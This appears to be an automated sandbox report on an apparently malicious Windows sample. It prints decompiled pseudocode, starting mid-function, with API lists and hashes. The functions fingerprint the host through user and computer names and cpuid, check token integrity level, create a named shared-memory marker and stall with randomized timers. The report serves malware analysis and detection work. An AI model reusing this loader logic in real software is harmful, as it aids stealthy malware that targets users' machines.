                                                          				char _v16;
                                                          				char _v20;
                                                          				signed int _v24;
                                                          				intOrPtr _v32;
                                                          				union _LARGE_INTEGER _v36;
                                                          				intOrPtr _v40;
                                                          				void* _v44;
                                                          				void _v88;
                                                          				char _v92;
                                                          				struct %anon52 _t46;
                                                          				intOrPtr _t51;
                                                          				long _t53;
                                                          				void* _t54;
                                                          				struct %anon52 _t60;
                                                          				long _t64;
                                                          				signed int _t65;
                                                          				void* _t68;
                                                          				void* _t70;
                                                          				signed int _t71;
                                                          				intOrPtr _t73;
                                                          				intOrPtr _t76;
                                                          				void** _t78;
                                                          				void* _t80;
                                                          
                                                          				_t73 = __edx;
                                                          				_v92 = 0;
                                                          				memset( &_v88, 0, 0x2c);
                                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                          				_v44 = _t46;
                                                          				if(_t46 == 0) {
                                                          					_v8.LowPart = GetLastError();
                                                          				} else {
                                                          					_push(0xffffffff);
                                                          					_push(0xff676980);
                                                          					_push(0);
                                                          					_push( *0x467d240);
                                                          					_v20 = 0;
                                                          					_v16 = 0;
                                                          					L0467AF2E();
                                                          					_v36.LowPart = _t46;
                                                          					_v32 = _t73;
                                                          					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                          					_t51 =  *0x467d26c; // 0x318
                                                          					_v40 = _t51;
                                                          					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          					_v8.LowPart = _t53;
                                                          					if(_t53 == 0) {
                                                          						if(_a8 != 0) {
                                                          							L4:
                                                          							 *0x467d24c = 5;
                                                          						} else {
                                                          							_t68 = E04678D14(_t73); // executed
                                                          							if(_t68 != 0) {
                                                          								goto L4;
                                                          							}
                                                          						}
                                                          						_v12 = 0;
                                                          						L6:
                                                          						L6:
                                                          						if(_v12 == 1 && ( *0x467d260 & 0x00000001) == 0) {
                                                          							_v12 = 2;
                                                          						}
                                                          						_t71 = _v12;
                                                          						_t58 = _t71 << 4;
                                                          						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                          						_t72 = _t71 + 1;
                                                          						_v24 = _t71 + 1;
                                                          						_t60 = E0467A376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                                          						_v8.LowPart = _t60;
                                                          						if(_t60 != 0) {
                                                          							goto L17;
                                                          						}
                                                          						_t65 = _v24;
                                                          						_v12 = _t65;
                                                          						_t90 = _t65 - 3;
                                                          						if(_t65 != 3) {
                                                          							goto L6;
                                                          						} else {
                                                          							_v8.LowPart = E046736B1(_t72, _t90,  &_v92, _a4, _a8);
                                                          						}
                                                          						goto L12;
                                                          						L17:
                                                          						__eflags = _t60 - 0x10d2;
                                                          						if(_t60 != 0x10d2) {
                                                          							_push(0xffffffff);
                                                          							_push(0xff676980);
                                                          							_push(0);
                                                          							_push( *0x467d244);
                                                          							goto L21;
                                                          						} else {
                                                          							__eflags =  *0x467d248; // 0x0
                                                          							if(__eflags == 0) {
                                                          								goto L12;
                                                          							} else {
                                                          								_t60 = E04676761();
                                                          								_push(0xffffffff);
                                                          								_push(0xdc3cba00);
                                                          								_push(0);
                                                          								_push( *0x467d248);
                                                          								L21:
                                                          								L0467AF2E();
                                                          								_v36.LowPart = _t60;
                                                          								_v32 = _t76;
                                                          								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                          								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          								_v8.LowPart = _t64;
                                                          								__eflags = _t64;
                                                          								if(_t64 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									goto L12;
                                                          								}
                                                          							}
                                                          						}
                                                          						L25:
                                                          					}
                                                          					L12:
                                                          					_t78 =  &_v92;
                                                          					_t70 = 3;
                                                          					do {
                                                          						_t54 =  *_t78;
                                                          						if(_t54 != 0) {
                                                          							HeapFree( *0x467d238, 0, _t54);
                                                          						}
                                                          						_t78 =  &(_t78[4]);
                                                          						_t70 = _t70 - 1;
                                                          					} while (_t70 != 0);
                                                          					CloseHandle(_v44);
                                                          				}
                                                          				return _v8;
                                                          				goto L25;
                                                          			}

                                                          APIs
                                                          • memset.NTDLL ref: 046751C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 046751D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 046751F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04675212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0467522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 046752C1
                                                          • CloseHandle.KERNEL32(?), ref: 046752D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0467530A
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04675D5E,?), ref: 04675320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0467532B
                                                            • Part of subcall function 04678D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04AF9368,00000000,?,74B5F710,00000000,74B5F730), ref: 04678D63
                                                            • Part of subcall function 04678D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04AF93A0,?,00000000,30314549,00000014,004F0053,04AF935C), ref: 04678E00
                                                            • Part of subcall function 04678D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0467523E), ref: 04678E12
                                                          • GetLastError.KERNEL32 ref: 0467533D
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: 8783d93e68296b9f4446f1f282f8161b495fedeebd28803abd305a53e96ced0d
                                                          • Instruction ID: 305c78ae3091a547f289ba84d2d7d25427357b42fc7faf56942a8628d89892af
                                                          • Opcode Fuzzy Hash: 8783d93e68296b9f4446f1f282f8161b495fedeebd28803abd305a53e96ced0d
                                                          • Instruction Fuzzy Hash: 99515C71801228BBDF11DF94DC44DEEBFB8EF49720F204655FA21A2290F774AA40CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E0467232F(intOrPtr __edx, void** _a4, void** _a8) {
                                                          				intOrPtr _v8;
                                                          				struct _FILETIME* _v12;
                                                          				short _v56;
                                                          				struct _FILETIME* _t12;
                                                          				intOrPtr _t13;
                                                          				void* _t17;
                                                          				void* _t21;
                                                          				intOrPtr _t27;
                                                          				long _t28;
                                                          				void* _t30;
                                                          
                                                          				_t27 = __edx;
                                                          				_t12 =  &_v12;
                                                          				GetSystemTimeAsFileTime(_t12);
                                                          				_push(0x192);
                                                          				_push(0x54d38000);
                                                          				_push(_v8);
                                                          				_push(_v12);
                                                          				L0467AF28();
                                                          				_push(_t12);
                                                          				_v12 = _t12;
                                                          				_t13 =  *0x467d2a8; // 0x47a5a8
                                                          				_t5 = _t13 + 0x467e87e; // 0x4af8e26
                                                          				_t6 = _t13 + 0x467e59c; // 0x530025
                                                          				_push(0x16);
                                                          				_push( &_v56);
                                                          				_v8 = _t27;
                                                          				L0467ABCA();
                                                          				_t17 = CreateFileMappingW(0xffffffff, 0x467d2ac, 4, 0, 0x1000,  &_v56); // executed
                                                          				_t30 = _t17;
                                                          				if(_t30 == 0) {
                                                          					_t28 = GetLastError();
                                                          				} else {
                                                          					if(GetLastError() == 0xb7) {
                                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                          						if(_t21 == 0) {
                                                          							_t28 = GetLastError();
                                                          							if(_t28 != 0) {
                                                          								goto L6;
                                                          							}
                                                          						} else {
                                                          							 *_a4 = _t30;
                                                          							 *_a8 = _t21;
                                                          							_t28 = 0;
                                                          						}
                                                          					} else {
                                                          						_t28 = 2;
                                                          						L6:
                                                          						CloseHandle(_t30);
                                                          					}
                                                          				}
                                                          				return _t28;
                                                          			}














                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04675C31,?,?,4D283A53,?,?), ref: 0467233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04672351
                                                          • _snwprintf.NTDLL ref: 04672376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,0467D2AC,00000004,00000000,00001000,?), ref: 04672392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04675C31,?,?,4D283A53), ref: 046723A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 046723BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04675C31,?,?), ref: 046723DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04675C31,?,?,4D283A53), ref: 046723E4
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 0bd778a7a2c7da1f5aa4856d7b5ea3a29852bc04fdf796cf9c36839e7aa684d3
                                                          • Instruction ID: 9753c632d5dcfefc02d03c5497b73663004b6f9f43d65f88a4b565cd620ba6fa
                                                          • Opcode Fuzzy Hash: 0bd778a7a2c7da1f5aa4856d7b5ea3a29852bc04fdf796cf9c36839e7aa684d3
                                                          • Instruction Fuzzy Hash: D021E172A00204BBD715EFA4DC45F8E37A9EB88720F200165FA09E72C0FA75ED49CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E04679135(char __eax, void* __esi) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v28;
                                                          				long _t34;
                                                          				signed int _t39;
                                                          				long _t50;
                                                          				char _t59;
                                                          				intOrPtr _t61;
                                                          				void* _t62;
                                                          				void* _t64;
                                                          				char _t65;
                                                          				intOrPtr* _t67;
                                                          				void* _t68;
                                                          				void* _t69;
                                                          
                                                          				_t69 = __esi;
                                                          				_t65 = __eax;
                                                          				_v8 = 0;
                                                          				_v12 = __eax;
                                                          				if(__eax == 0) {
                                                          					_t59 =  *0x467d270; // 0xd448b889
                                                          					_v12 = _t59;
                                                          				}
                                                          				_t64 = _t69;
                                                          				E0467A6CC( &_v12, _t64);
                                                          				if(_t65 != 0) {
                                                          					 *_t69 =  *_t69 ^  *0x467d2a4 ^ 0x4c0ca0ae;
                                                          				} else {
                                                          					GetUserNameW(0,  &_v8); // executed
                                                          					_t50 = _v8;
                                                          					if(_t50 != 0) {
                                                          						_t62 = RtlAllocateHeap( *0x467d238, 0, _t50 + _t50);
                                                          						if(_t62 != 0) {
                                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                          								_t64 = _t62;
                                                          								 *_t69 =  *_t69 ^ E04677306(_v8 + _v8, _t64);
                                                          							}
                                                          							HeapFree( *0x467d238, 0, _t62);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t61 = __imp__;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				GetComputerNameW(0,  &_v8);
                                                          				_t34 = _v8;
                                                          				if(_t34 != 0) {
                                                          					_t68 = RtlAllocateHeap( *0x467d238, 0, _t34 + _t34);
                                                          					if(_t68 != 0) {
                                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                          							_t64 = _t68;
                                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04677306(_v8 + _v8, _t64);
                                                          						}
                                                          						HeapFree( *0x467d238, 0, _t68);
                                                          					}
                                                          				}
                                                          				asm("cpuid");
                                                          				_t67 =  &_v28;
                                                          				 *_t67 = 1;
                                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                          				 *(_t67 + 0xc) = _t64;
                                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                          				return _t39;
                                                          			}




















                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0467916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04679183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04679190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04675D20), ref: 046791B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 046791D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 046791EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 046791F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04675D20), ref: 04679217
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: 3a4bc7364f7f1b1f475a14c0815662e02d86dc38bf6ccd3b02c06247d45efdaa
                                                          • Instruction ID: f9c97f9fa13f16700e37bc6370f746899a82343fd72e38151fd1038ddb8ce1e7
                                                          • Opcode Fuzzy Hash: 3a4bc7364f7f1b1f475a14c0815662e02d86dc38bf6ccd3b02c06247d45efdaa
                                                          • Instruction Fuzzy Hash: 7E3139B1A00209EFEB14DFA8DC80AAEB7F9EF54344B114469E614D7250FB34EE169B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04671A08(long* _a4) {
                                                          				long _v8;
                                                          				void* _v12;
                                                          				void _v16;
                                                          				long _v20;
                                                          				int _t33;
                                                          				void* _t46;
                                                          
                                                          				_v16 = 1;
                                                          				_v20 = 0x2000;
                                                          				if( *0x467d25c > 5) {
                                                          					_v16 = 0;
                                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                          						_v8 = 0;
                                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                          						if(_v8 != 0) {
                                                          							_t46 = E0467A71F(_v8);
                                                          							if(_t46 != 0) {
                                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                          								if(_t33 != 0) {
                                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                          								}
                                                          								E0467A734(_t46);
                                                          							}
                                                          						}
                                                          						CloseHandle(_v12);
                                                          					}
                                                          				}
                                                          				 *_a4 = _v20;
                                                          				return _v16;
                                                          			}










                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04671A3A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04671A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04671A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 04671ABA
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04671A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04671A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04671AA5
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: 769a8855fec8cdfffcef207b4c4f272520260e1c4855e43fee6a3ad1565c7471
                                                          • Instruction ID: 7de1adba56f33d5a3677665925ddefe6d9317bcb44d908caf2cff56de2526523
                                                          • Opcode Fuzzy Hash: 769a8855fec8cdfffcef207b4c4f272520260e1c4855e43fee6a3ad1565c7471
                                                          • Instruction Fuzzy Hash: E9213C7590024DFFEB10DFA4DC84EEEBBB9EF45304F1001A6EA11A6290E7759E45DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 0467395A
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 046739DD
                                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 04673A1D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04673A3F
                                                            • Part of subcall function 04676F3A: SysAllocString.OLEAUT32(0467C290), ref: 04676F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04673A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04673AA1
                                                            • Part of subcall function 04671AE2: Sleep.KERNELBASE(000001F4), ref: 04671B2A
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                          • String ID:
                                                          • API String ID: 2118684380-0
                                                          • Opcode ID: e63f1e069a7f71a39611f74cc8cb07cf29f842da86726d5da510a34c983dd97b
                                                          • Instruction ID: 3d561a28f9ae9fc00749599fe70b7eb40a438d0ad1d3c58946d4fe57c3a812b0
                                                          • Opcode Fuzzy Hash: e63f1e069a7f71a39611f74cc8cb07cf29f842da86726d5da510a34c983dd97b
                                                          • Instruction Fuzzy Hash: B5514C76500609AFDB01CFA8C844ADEB7B6FF98744F248869E905DB320EB35ED45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E046712E5(void* __ecx, void* __edx, intOrPtr _a4) {
                                                          				struct _FILETIME _v12;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				int _t14;
                                                          				signed int _t16;
                                                          				void* _t18;
                                                          				signed int _t19;
                                                          				unsigned int _t23;
                                                          				void* _t26;
                                                          				signed int _t33;
                                                          
                                                          				_t26 = __edx;
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                          				 *0x467d238 = _t10;
                                                          				if(_t10 != 0) {
                                                          					 *0x467d1a8 = GetTickCount();
                                                          					_t12 = E04673E69(_a4);
                                                          					if(_t12 == 0) {
                                                          						do {
                                                          							GetSystemTimeAsFileTime( &_v12);
                                                          							_t14 = SwitchToThread();
                                                          							_t23 = _v12.dwHighDateTime;
                                                          							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                          							_push(0);
                                                          							_push(9);
                                                          							_push(_t23 >> 7);
                                                          							_push(_t16);
                                                          							L0467B08A();
                                                          							_t33 = _t14 + _t16;
                                                          							_t18 = E04675548(_a4, _t33);
                                                          							_t19 = 2;
                                                          							_t25 = _t33;
                                                          							Sleep(_t19 << _t33); // executed
                                                          						} while (_t18 == 1);
                                                          						if(E04674DA2(_t25) != 0) {
                                                          							 *0x467d260 = 1; // executed
                                                          						}
                                                          						_t12 = E04675BA2(_t26); // executed
                                                          					}
                                                          				} else {
                                                          					_t12 = 8;
                                                          				}
                                                          				return _t12;
                                                          			}














                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04674EF2,?), ref: 046712F8
                                                          • GetTickCount.KERNEL32 ref: 0467130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04674EF2,?), ref: 04671328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04674EF2,?), ref: 0467132E
                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 0467134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04674EF2,?), ref: 04671365
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: 7bacdc3bf4f9bbf2ec82b00d47c9d444f7e606f1e6500d89631ea657785fa49e
                                                          • Instruction ID: c228dfe06d7ec83d19387c7c88d5cfefc7dde8d5a6695f5c63bfa5559d72c87c
                                                          • Opcode Fuzzy Hash: 7bacdc3bf4f9bbf2ec82b00d47c9d444f7e606f1e6500d89631ea657785fa49e
                                                          • Instruction Fuzzy Hash: A4110872A40300BFF314AB74DC19F6A3B98EB44364F00451AFA85D6780FA79FC0086A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 57%
                                                          			E04675BA2(signed int __edx) {
                                                          				signed int _v8;
                                                          				long _v12;
                                                          				CHAR* _v16;
                                                          				long _v20;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t21;
                                                          				CHAR* _t22;
                                                          				CHAR* _t25;
                                                          				intOrPtr _t26;
                                                          				void* _t27;
                                                          				void* _t31;
                                                          				void* _t32;
                                                          				CHAR* _t36;
                                                          				CHAR* _t43;
                                                          				CHAR* _t44;
                                                          				void* _t49;
                                                          				void* _t51;
                                                          				CHAR* _t54;
                                                          				signed char _t56;
                                                          				intOrPtr _t58;
                                                          				signed int _t59;
                                                          				void* _t62;
                                                          				CHAR* _t65;
                                                          				CHAR* _t66;
                                                          				char* _t67;
                                                          				void* _t68;
                                                          
                                                          				_t61 = __edx;
                                                          				_v20 = 0;
                                                          				_v8 = 0;
                                                          				_v12 = 0;
                                                          				_t21 = E04676C09();
                                                          				if(_t21 != 0) {
                                                          					_t59 =  *0x467d25c; // 0x4000000a
                                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                                          					 *0x467d25c = (_t59 & 0xf0000000) + _t21;
                                                          				}
                                                          				_t22 =  *0x467d160(0, 2);
                                                          				_v16 = _t22;
                                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                          					_t25 = E0467496B( &_v8,  &_v20); // executed
                                                          					_t54 = _t25;
                                                          					_t26 =  *0x467d2a8; // 0x47a5a8
                                                          					if( *0x467d25c > 5) {
                                                          						_t8 = _t26 + 0x467e5cd; // 0x4d283a53
                                                          						_t27 = _t8;
                                                          					} else {
                                                          						_t7 = _t26 + 0x467e9f5; // 0x44283a44
                                                          						_t27 = _t7;
                                                          					}
                                                          					E0467729A(_t27, _t27);
                                                          					_t31 = E0467232F(_t61,  &_v20,  &_v12); // executed
                                                          					if(_t31 == 0) {
                                                          						CloseHandle(_v20);
                                                          					}
                                                          					_t62 = 5;
                                                          					if(_t54 != _t62) {
                                                          						 *0x467d270 =  *0x467d270 ^ 0x81bbe65d;
                                                          						_t32 = E0467A71F(0x60);
                                                          						 *0x467d32c = _t32;
                                                          						__eflags = _t32;
                                                          						if(_t32 == 0) {
                                                          							_push(8);
                                                          							_pop(0);
                                                          						} else {
                                                          							memset(_t32, 0, 0x60);
                                                          							_t49 =  *0x467d32c; // 0x4af95b0
                                                          							_t68 = _t68 + 0xc;
                                                          							__imp__(_t49 + 0x40);
                                                          							_t51 =  *0x467d32c; // 0x4af95b0
                                                          							 *_t51 = 0x467e81a;
                                                          						}
                                                          						_t54 = 0;
                                                          						__eflags = 0;
                                                          						if(0 == 0) {
                                                          							_t36 = RtlAllocateHeap( *0x467d238, 0, 0x43);
                                                          							 *0x467d2c8 = _t36;
                                                          							__eflags = _t36;
                                                          							if(_t36 == 0) {
                                                          								_push(8);
                                                          								_pop(0);
                                                          							} else {
                                                          								_t56 =  *0x467d25c; // 0x4000000a
                                                          								_t61 = _t56 & 0x000000ff;
                                                          								_t58 =  *0x467d2a8; // 0x47a5a8
                                                          								_t13 = _t58 + 0x467e55a; // 0x697a6f4d
                                                          								_t55 = _t13;
                                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x467c287);
                                                          							}
                                                          							_t54 = 0;
                                                          							__eflags = 0;
                                                          							if(0 == 0) {
                                                          								asm("sbb eax, eax");
                                                          								E04679135( ~_v8 &  *0x467d270, 0x467d00c); // executed
                                                          								_t54 = E0467888E(_t55);
                                                          								__eflags = _t54;
                                                          								if(_t54 != 0) {
                                                          									goto L30;
                                                          								}
                                                          								_t43 = E046787AE(); // executed
                                                          								__eflags = _t43;
                                                          								if(_t43 != 0) {
                                                          									__eflags = _v8;
                                                          									_t65 = _v12;
                                                          									if(_v8 != 0) {
                                                          										L29:
                                                          										_t44 = E046751B0(_t61, _t65, _v8); // executed
                                                          										_t54 = _t44;
                                                          										goto L30;
                                                          									}
                                                          									__eflags = _t65;
                                                          									if(__eflags == 0) {
                                                          										goto L30;
                                                          									}
                                                          									_t54 = E04671C66(__eflags,  &(_t65[4]));
                                                          									__eflags = _t54;
                                                          									if(_t54 == 0) {
                                                          										goto L30;
                                                          									}
                                                          									goto L29;
                                                          								}
                                                          								_t54 = 8;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t66 = _v12;
                                                          						if(_t66 == 0) {
                                                          							L30:
                                                          							if(_v16 == 0 || _v16 == 1) {
                                                          								 *0x467d15c();
                                                          							}
                                                          							goto L34;
                                                          						}
                                                          						_t67 =  &(_t66[4]);
                                                          						do {
                                                          						} while (E0467A273(_t62, _t67, 0, 1) == 0x4c7);
                                                          					}
                                                          					goto L30;
                                                          				} else {
                                                          					_t54 = _t22;
                                                          					L34:
                                                          					return _t54;
                                                          				}
                                                          			}































                                                          APIs
                                                            • Part of subcall function 04676C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,04675BBB,00000000,00000000), ref: 04676C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04675C38
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • memset.NTDLL ref: 04675C87
                                                          • RtlInitializeCriticalSection.NTDLL(04AF9570), ref: 04675C98
                                                            • Part of subcall function 04671C66: memset.NTDLL ref: 04671C7B
                                                            • Part of subcall function 04671C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04671CBD
                                                            • Part of subcall function 04671C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04671CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04675CC3
                                                          • wsprintfA.USER32 ref: 04675CF3
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
